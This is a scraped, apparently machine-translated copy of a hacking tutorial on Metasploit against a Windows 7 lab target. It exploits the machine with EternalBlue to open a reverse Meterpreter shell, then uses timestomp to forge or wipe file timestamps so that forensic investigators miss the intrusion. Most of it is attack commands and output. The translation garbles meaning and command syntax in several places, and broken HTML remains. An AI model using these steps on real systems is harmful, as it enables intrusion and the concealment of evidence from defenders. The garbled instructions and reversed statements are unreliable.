قالب وردپرس درنا توس
Home / Tips and Tricks / Using Metasploits Timestomp to Modify File Attributes and Avoid Detecting «Null Bytes :: WonderHowTo

Using Metasploits Timestomp to Modify File Attributes and Avoid Detecting «Null Bytes :: WonderHowTo



It is said that the best way to avoid hacking detection is to leave no trace. Often this means not touching the file system at all. But realistically, in most cases it's impossible not to interact with the file system in one way or another. Next, you should change the file attributes to hide the activity. We can do this with Metasploits Timestomp.

What are MACE values?

MACE values ​​(modified, accessed, created, typed) are file attributes that describe the date and time of the activity in a file. These attributes are used by administrators to determine when a file was last accessed or modified. They can often be used to track malicious activity.

The best way to hack is to leave no trace at all. But changing MACE attributes might be the next best thing. This method is not infallible, but it can help hide your activity in the file system.

However, common sense must be used as data in the past (or future) can be a dead giveaway for hacking activity. Changing all four attributes to the same date and time is also a win, since this would be impossible.

Step 1: Setting Up Everything

We will be using a copy of Windows 7 as our brand and Kali using Linux as our attacking machine. First, we need to create some sample files on the target. I've also created a new folder named "MyFiles" to keep it in order. It does not matter what it is – some basic text files will be more than enough.

At Amazon: & # 39; Metasploit for Beginners: Build a Threat-Free Environment with the Best-in-Class Tool

Step 2: Get a Meterpreter Session

After we are all set to this goal, start metasploit on your attacking computer by typing ] msfconsole in the terminal.

  ~ # msfconsole

msf5> 

This target is vulnerable to EternalBlue. So I will use it to get a shell. However, it does not matter what you use, as long as you have a Meterpreter session on the target.

  msf5> use exploit / windows / smb / ms17_010_eternalblue
Execute msf5 exploit (windows / smb / ms17_010_eternalblue)>

[*] The reverse TCP handler was started on 10.10.0.1:1234
[*] 10.10.0.104:445 - Establish connection to the target for exploitation.
[+] 10.10.0.104:445 - Connection made for utilization.
[+] 10.10.0.104:445 - The selected target operating system is valid for the operating system specified in the SMB response
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 Ice pack 1
[+] 10.10.0.104:445 - Target arc selected, valid for the arc specified by the DCE / RPC response
[*] 10.10.0.104:445 - Try Exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - All but the last fragment of an exploit packet will be sent
[*] 10.10.0.104:445 - Start non-paged pool maintenance
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Close the SMBv1 connection, creating a free hole next to the SMBv2 buffer.
[*] 10.10.0.104:445 - Sending the last SMBv2 buffer.
[*] 10.10.0.104:445 - Last fragment of an exploit package is sent!
[*] 10.10.0.104:445 - The response from the exploit package is received
[+] 10.10.0.104:445 - ETERNALBLUE override successfully completed (0xC000000D)!
[*] 10.10.0.104:445 - Send the egg to a damaged connection.
[*] 10.10.0.104:445 - Trigger without damaged buffer.
[*] Transmission Level (206403 Bytes) to 10.10.0.104
[*] Meterpreter Session 1 has been opened at 2019-04-08 10:41:26 -0500 (10.10.0.1:1234 -> 10.10.0.104:49233)
[+] 10.10.0.104:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[+] 10.10.0.104:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - WIN - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
[+] 10.10.0.104:445 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

meterpreter> 

Step 3: Check the files on the target

After the target has been compromised, enter the pwd command to display the current working directory.

  meterpreter> pwd

C:  Windows  system32 

Since we have created a new folder on drive C, we can navigate there and confirm that the previously created files exist.

  meterpreter> cd C: / Myfiles
meterpreter> ls

Listing: C:  Myfiles
==================

Mode Size Type Last modified name
---- ---- ---- ------------- ----
100666 / rw-rw-rw-12 fil 2019-04-08 12:43:24 -0500 example.txt
100666 / rw-rw-rw-7 fil 2019-04-08 12:43:55 -0500 test1.txt
100666 / rw-rw-rw- 13 fil 2019-04-08 12:43:55 -0500 test2.txt
100666 / rw-rw-rw-127 fil 2019-04-08 12:43:55 -0500 test3.txt 

Step 4: Modify file attributes with timestomp

Timestomp is a recycle module available in meterpreter, with the MACE values ​​of files can be changed. This is useful because we can change the times and dates of all files we access to minimize the risk of getting caught.

In a Meterpreter session, use timestomp help to display the Help menu for this module:

  meterpreter> timestomp help

Usage: timestomp  OPTIONS

OPTIONS:

-a  Sets the time the file was last accessed
-b Sets the MACE timestamps to show spaces in EnCase
-c  Sets the creation time of the file
-e  Sets the "MFT Entry Modified" time of the file
-f  Sets the MACE of attributes to the specified file
-h help banner
-m  Sets the "last written" time of the file
-r Sets the MACE timestamps in a directory recursively
-v Displays the UTC MACE values ​​of the file
-z  Set all four attributes (MACE) of file 

1. Display MACE Values ​​for a File

Specify the file and the desired option to perform an action. For example, to display the MACE values ​​of a file, use the flag -v .

  meterpreter> timestomp example.txt -v

[*] Display MACE attributes for example.txt
Changed: 2019-04-08 13:44:25 -0500
Access: 2019-04-08 13:43:24 -0500
Created: 2019-04-08 13:43:24 -0500
Entry changed: 2019-04-08 13:44:25 -0500 

2. Changing Changed, Called, Created, and Input Modified Values ​​

Each of these attributes can be changed with the appropriate option and a valid DateTime format. To change the "changed" value, use the flag -m .

  meterpreter> timestomp example.txt -m "02/14/2012 08:10:03"

[*] Setting Specific MACE Attributes in example.txt 

Now that we're looking at the file attributes, we can see that this has changed.

  meterpreter> timestomp example.txt -v

[*] Display MACE attributes for example.txt
Changed: 2012-02-14 08:10:03 -0600
Access: 2019-04-08 13:43:24 -0500
Created: 2019-04-08 13:43:24 -0500
Entry modified: 2019-04-08 13:44:25 -0500 

We can also do this for the "access" value by using the flag -a .

  meterpreter> timestomp example. txt -a "14.02.2012 08:10:03"

[*] Setting specific MACE attributes in example.txt 

and the "created" value with the flag -c .

  meterpreter> timestomp example.txt -c "03/11/1999 10: 05: 01"

[*] Setting specific MACE attributes in example.txt 

And finally the value for "entry modified" using the flag -e .

  meterpreter> timestomp example.txt -e "04/25 / 2018 11:11:08"

[*] Setting specific MACE attributes in example.txt 

If we now view the file, we can see that all of these changes have come into effect.

  meterpreter> timestomp example.txt -v

[*] Display MACE attributes for example.txt
Changed: 2012-02-14 08:10:03 -0600
Access: 2012-02-14 08:10:03 -0600
Created: 1999-03-11 10:05:01 -0600
Entry changed: 2018-04-25 12:11:08 -0500 

3. Changing All Values ​​Simultaneously

You can also change these attributes all at once if you want all values ​​to be the same. Use the flag -z .

  meterpreter> timestomp example.txt -z "15/10/2017 05:30:22"

[*] Setting specific MACE attributes in example.txt 

And now all have changed again.

  meterpreter> timestomp example.txt -v

[*] Display MACE attributes for example.txt
Changed: 2017-10-15 06:30:22 -0500
Access: 2017-10-15 06:30:22 -0500
Created: 2017-10-15 06:30:22 -0500
Entry modified: 2017-10-15 06:30:22 -0500 

4. Matching Values ​​with Another File

There is also an interesting option to equate the MACE attributes to an existing file on the system using the -f flag, but I could not get this to work.

  meterpreter> timestomp example.txt -f C: \ Windows \ notepad.exe

[*] Retrieving MACE attributes from C:  Windows  notepad.exe
[-] priv_fs_get_file_mace: Operation failed: The handle is invalid. 

. 5 Remove all values ​​

With the flag -b the file attributes can be deleted completely.

  meterpreter> timestomp example.txt -b

[*] Hiding MACE attributes for the example.txt file 

If we now view the file, the nonsensical values ​​appear as dates in the future, which is obviously impossible.

  meterpreter> timestomp example.txt -v

[*] Display MACE attributes for example.txt
Changed: 2106-02-07 00:28:15 -0600
Access: 2106-02-07 00:28:15 -0600
Created: 2106-02-07 00:28:15 -0600
Entry changed: 2106-02-07 00:28:15 -0600 

With the flag -r all files in the current directory can be deleted recursively.

  meterpreter> timestomp ./ - r

[*] Deleting MACE attributes in the directory at ./[19659013<Whenwelookatthefilesontargetnowthedatawillbedisplayedasempty[196659055]Using Metasploits Timestomp to modify file attributes and avoid detection " width="532" height="532" style="max-width:532px;height:auto;"/>

Line Break Up

Today we have a little bit of the MACE values of files and their relevance to forensics learned. After we initially compromised our target and won a meterpreter session, we examined timestomp and how it can be used to change MACE attributes to avoid detection. But do it with a pinch of salt - changing file attributes is better than nothing if you try to hide, but it's not perfect. Stay frosty, white hats.

Do Not Miss: Discover Open Ports with Metasploit's Built-in Port Scanner

Free-Photos / Pixabay Cover Image; Screenshots of drd_ / zero byte

Source link